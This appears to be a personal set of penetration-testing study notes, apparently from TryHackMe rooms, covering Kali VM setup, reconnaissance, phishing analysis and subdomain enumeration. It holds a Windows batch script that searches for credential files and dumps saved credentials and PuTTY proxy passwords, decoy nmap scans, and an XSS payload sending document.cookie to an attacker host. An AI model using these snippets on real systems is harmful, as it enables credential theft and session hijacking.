https://www.nomoreransom.org/
crypto-sheriff: Able to identify the category of Ransomware
decryption-tools: Providing download of Decryption tools
report-a-crime: A collection itemizing links of law enforcement agencies
https://www.nomoreransom.org/
crypto-sheriff: Able to identify the category of Ransomware
decryption-tools: Providing download of Decryption tools
report-a-crime: A collection itemizing links of law enforcement agencies
Start Penguin
Run the following commands
$ sudo apt-get update
$ sudo apt install qemu-kvm libvirt-clients libvirt-daemon-system bridge-utils virtinst libvirt-daemon virt-manager
Go back to Chrome OS's Start button and run "Virtual Machine Manager".
Download Kali qemu version to an USB flash drive before plugging the drive into Chrome OS.
#wmic product get name,version,vendor
@echo off
echo(
echo Showing significant files...
IF EXIST "C:\Unattend.xml" (
echo C:\Unattend.xml exists.
)
IF EXIST "C:\Windows\Panther\Unattend.xml" (
echo C:\Windows\Panther\Unattend.xml exists.
)
IF EXIST "C:\Windows\Panther\Unattend\Unattend.xml" (
echo C:\Windows\Panther\Unattend\Unattend.xml exists.
)
IF EXIST "C:\Windows\system32\sysprep.inf" (
echo C:\Windows\system32\sysprep.inf exists.
)
IF EXIST "C:\Windows\system32\sysprep\sysprep.xml" (
echo C:\Windows\system32\sysprep.inf exists.
)
IF EXIST "%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" (
echo %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt exists.
)
IF EXIST "C:\inetpub\wwwroot\web.config" (
echo C:\inetpub\wwwroot\web.config exists.
)
IF EXIST "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config" (
echo C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config exists.
)
echo(
echo Showing saved credentials on the system...
cmdkey /list
echo(
echo Show Putty Proxy passwords...
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
#nmap -e tun0 -f -T1 -D 10.10.174.103,RND,10.10.174.104,RND,ME,RND,RND -Pn 10.10.174.2
Use Fragment, Low Rate and Decoy techniques to scan 10.10.174.2
-l username Provide the login name
-P WordList.txt Specify the password list (e.g. /usr/share/wordlists/rockyou.txt) to use
server service Set the server address and service to attack
-s PORT Use in case of non-default service port number
-V or -vV Show the username and password combinations being tried
-d Display debugging output if the verbose output is not helping
-oN save output in normal format
-oG save output in grepable format
-oX save output in XML format
-oA save output in normal, XML and Grepable formats
Attacker Machine:
# nmap -sT -Pn --script all -p 80 VICTIM_IP_ADDRESS
Victim Machine:
# ncat -l -k -t -p 80
Use Firefox to browse the URL, open "Web Developer Tools", go to "Console" tab, and run the command "jQuery.ui.version".
1. X-Originating-IP - The IP address of the email was sent from (this is known as an X-header)
2. Smtp.mailfrom/header.from - The domain the email was sent from (these headers are within Authentication-Results)
3. Reply-To - Instead of replying the From email address, this is the email address specific to receiving replying emails
Reference: https://web.archive.org/web/20221219232959/https://mediatemple.net/community/products/all/204643950/understanding-an-email-header
[TryHackMe] URL Shortener
Common URL Shorteners are shown as follows.
bit.ly
goo.gl
ow.ly
s.id
smarturl.it
tiny.pl
tinyurl.com
x.co
Append "+" to the shortened URL to see the original URL.
Example:
What you saw in the URL above is adıdas.de which has the Punycode of http://xn--addas-o4a.de/
Tool:
Punycode can be inserted through Microsoft Word.
Punycode translator:
https://www.punycoder.com/
https://metadefender.com/
https://talosintelligence.com/
https://www.virustotal.com/gui/home/upload
https://intelligence.any.run/analysis/lookup
https://bazaar.abuse.ch/browse/
https://malshare.com/search.php
PS: Obtain SHA256 under Windows
#CertUtil -hashfile [FILENAME] SHA256
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/danielmiessler/SecLists
XSS Payload:
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
Listening side:
#nc -nvlp PORT_NUMBER
# Manually execute "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope Process"
# Name this file as Listen-TCP.ps1 param ( [int]$Port = 8080 # Default port is 8080, you can specify another port when running the script ) $gsock = { # Create a TCP listener on the specified port $listener = [System.Net.Sockets.TcpListener]$Port $listener.Start() Write-Host "Listening on port $Port..." try { while ($true) { # Accept a client connection $client = $listener.AcceptTcpClient() Write-Host "Client connected!" # Get the network stream for reading data $stream = $client.GetStream() # Set up a reader to read from the stream $reader = New-Object System.IO.StreamReader($stream) # Read the data from the stream while ($reader.Peek()) { $data = $reader.ReadLine() Write-Host "Received: $data" } # Close the client connection $reader.Close() $client.Close() } } catch { Write-Host "Error: $_" } finally { # Stop the listener when done $listener.Stop() Write-Host "Listener stopped." .$gsock } } &$gsock # .\Listen-TCP.ps1 -Port 9090
1) CA's Certificate Transparency logs
Use https://crt.sh/ to search the domain.
2) Google Hacking
Utilize the keywords, "site" and "inurl".
3) Employing the tool, dnsrecon
# dnsrecon -t brt -d DOMAIN
4) Employing another tool, sublist3r.py
# sublist3r.py -d DOMAIN
5) Leveraging Virtual Host through the tool, ffuf
# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u http://IP